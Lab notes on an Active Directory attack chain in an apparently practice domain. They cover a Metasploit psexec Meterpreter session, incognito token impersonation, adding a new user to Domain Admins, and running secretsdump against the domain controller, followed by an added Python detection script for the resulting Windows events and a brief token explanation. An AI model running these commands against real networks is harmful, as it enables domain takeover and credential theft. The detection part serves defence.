Use Incognito in Metasploit:
Getting Meterpreter session:
msfconsole
search psexec
use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/reverse_tcp
set rhosts 192.168.218.139 #Victim PC, this is ThePunisher
set smbuser fcastle
set smbpass Password1
set smbdomain MARVEL.local
options #to confirm everything is set
run
Meterpreter steps:
Confirm who we are on the target (optional, we already know the psexec creds):
shell
whoami
ctrl + c #answer y to terminate the channel and drop back to the meterpreter prompt
Attack with incognito:
load incognito
list_tokens -u #-u lists user tokens, -g lists group tokens
impersonate_token marvel\\fcastle #the backslash has to be doubled, meterpreter treats a single \ as an escape
Check:
shell
whoami
ctrl + c
Drop the impersonation and go back to the original token:
rev2self
getuid
Impersonate the domain administrator if their token is on the box (they have to have logged on to this machine):
list_tokens -u
impersonate_token marvel\\administrator
Create a domain user for ourselves (runs as the impersonated administrator):
shell
net user hawkeye Password1@ /add /domain
Add the new user to Domain Admins:
net group "Domain Admins" hawkeye /add /domain
Test / what next?
Try to dump the domain secrets from the domain controller (which we could not do with any of the accounts we had: fcastle and the SQLService account we cracked):
secretsdump.py MARVEL.local/hawkeye:'Password1@'@192.168.218.136 #IP is the domain controller
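The other side of this chain is what a defender sees. Below is an added detection example (not part of the original notes) that scans Windows Security events for the three loud steps above: a user account being created (4720), that account being added to Domain Admins (4728, the group whose SID ends in the well-known RID 512), and a secretsdump-style replication request (4662 carrying the DS-Replication-Get-Changes GUID 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2) from a plain user account instead of a domain controller's machine account. The events are constructed for the example; the domain SID and the DC hostname "DC01" are made up, since the notes only give the DC's IP.

```python
"""Detection check for the attack chain above (added example, not from the
original notes): account creation, Domain Admins membership change and
secretsdump-style replication, spotted from Windows Security events.

Event IDs used:
  4720  a user account was created
  4728  a member was added to a security-enabled global group
        (Domain Admins has RID 512, so its TargetSid ends in -512)
  4662  an operation was performed on a directory-service object; a request
        carrying the DS-Replication-Get-Changes control access right
        (GUID 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2) from an ordinary user
        is what secretsdump's DRSUAPI replication looks like on the DC
        (requires Directory Service Access auditing to be enabled)

The events below are constructed for this example. Field names follow the
Security log EventData names; the domain SID and DC name "DC01" are made up.
"""

DOMAIN_ADMINS_RID_SUFFIX = "-512"
DS_REPL_GET_CHANGES_GUID = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"

# Constructed sample events, in the order the attack above would produce them.
SAMPLE_EVENTS = [
    # fcastle's psexec network logon to THEPUNISHER: ordinary, not flagged
    {"EventID": 4624, "SubjectUserName": "-", "TargetUserName": "fcastle",
     "LogonType": 3, "Computer": "THEPUNISHER"},
    # `net user hawkeye ... /add /domain` run under the impersonated admin token
    {"EventID": 4720, "SubjectUserName": "Administrator",
     "TargetUserName": "hawkeye", "Computer": "DC01"},
    # `net group "Domain Admins" hawkeye /add /domain`
    {"EventID": 4728, "SubjectUserName": "Administrator",
     "MemberName": "CN=hawkeye,CN=Users,DC=MARVEL,DC=local",
     "TargetUserName": "Domain Admins",
     "TargetSid": "S-1-5-21-1111111111-2222222222-3333333333-512",
     "Computer": "DC01"},
    # secretsdump.py against the DC as hawkeye: replication request by a user
    {"EventID": 4662, "SubjectUserName": "hawkeye",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
                   " {19195a5b-6da0-11d0-afd3-00c04fd930c9}",
     "Computer": "DC01"},
    # the same request from another DC's machine account is routine replication
    {"EventID": 4662, "SubjectUserName": "DC02$",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}",
     "Computer": "DC01"},
]


def member_sam(member_dn):
    """'CN=hawkeye,CN=Users,DC=MARVEL,DC=local' -> 'hawkeye'.
    4728 carries the new member as a distinguished name, not a SAM name."""
    first_rdn = member_dn.split(",", 1)[0]
    return first_rdn.split("=", 1)[1] if "=" in first_rdn else first_rdn


def is_domain_admins_add(ev):
    return ev.get("EventID") == 4728 and \
        ev.get("TargetSid", "").endswith(DOMAIN_ADMINS_RID_SUFFIX)


def analyze(events):
    """Return a list of (finding, principal, detail) tuples."""
    findings = []
    created_here = set()  # accounts created earlier in this batch of events
    for ev in events:
        eid = ev.get("EventID")
        if eid == 4720:
            created_here.add(ev["TargetUserName"].lower())
            findings.append(("account_created", ev["TargetUserName"],
                             "by " + ev["SubjectUserName"]))
        elif is_domain_admins_add(ev):
            who = member_sam(ev["MemberName"]).lower()
            # a brand-new account going straight into Domain Admins is the
            # pattern from the notes above
            severity = "critical" if who in created_here else "high"
            findings.append(("added_to_domain_admins", who, severity))
        elif eid == 4662 and \
                DS_REPL_GET_CHANGES_GUID in ev.get("Properties", "").lower():
            subject = ev["SubjectUserName"]
            # domain controllers replicate under their machine accounts (name$);
            # a plain user asking for replication rights is DCSync/secretsdump
            if not subject.endswith("$"):
                findings.append(("replication_by_user_account", subject,
                                 "on " + ev["Computer"]))
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding)
```

Note what is not in the list: the incognito impersonation itself. Stealing a token on ThePunisher does not produce a distinct event on the DC; what the DC sees is Administrator doing things from a workstation, which is why the new-account-then-Domain-Admins pattern and the replication request are the signals worth alerting on.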
Attack Explained:
Windows access tokens are temporary keys that let you access a system or network resource without providing credentials each time you touch a file. Like cookies!
Two types:
- Delegate: created for interactive logons, e.g. logging into a machine at the console or over Remote Desktop (RDP). These are the valuable ones, because they can be used to access remote resources.
- Impersonate: created for "non-interactive" logons such as attaching a network drive or running a domain logon script (like our mapped drive on spiderman). These only work on the local machine.
Pop a shell and load incognito:
VS finding a domain admin token: